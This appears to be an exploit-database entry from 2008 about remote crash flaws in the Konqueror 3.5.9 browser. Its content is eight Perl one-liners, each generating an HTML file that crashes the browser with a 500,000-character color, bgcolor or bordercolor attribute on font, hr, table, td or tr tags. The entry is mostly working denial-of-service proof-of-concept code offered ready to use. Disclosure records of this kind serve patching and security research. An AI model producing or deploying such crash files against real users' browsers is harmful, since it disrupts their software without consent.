Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities



EKU-ID: 14581 CVE: OSVDB-49033;CVE-2008-5712;CVE-2008-4514 OSVDB-ID:
Author: Jeremy Brown Published: 2008-10-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


KDE's Konqueror & Color Attribute Love

perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . ">\n</html>"' > kdie.html
perl -e 'print "<html>\n" . "<hr color=" . "A" x 500000 . ">\n</html>"' > kdie2.html
perl -e 'print "<html>\n" . "<table bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie3.html
perl -e 'print "<html>\n" . "<table bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie4.html
perl -e 'print "<html>\n" . "<td bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie5.html
perl -e 'print "<html>\n" . "<td bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie6.html
perl -e 'print "<html>\n" . "<tr bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie7.html
perl -e 'print "<html>\n" . "<tr bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie8.html

# milw0rm.com [2008-10-08]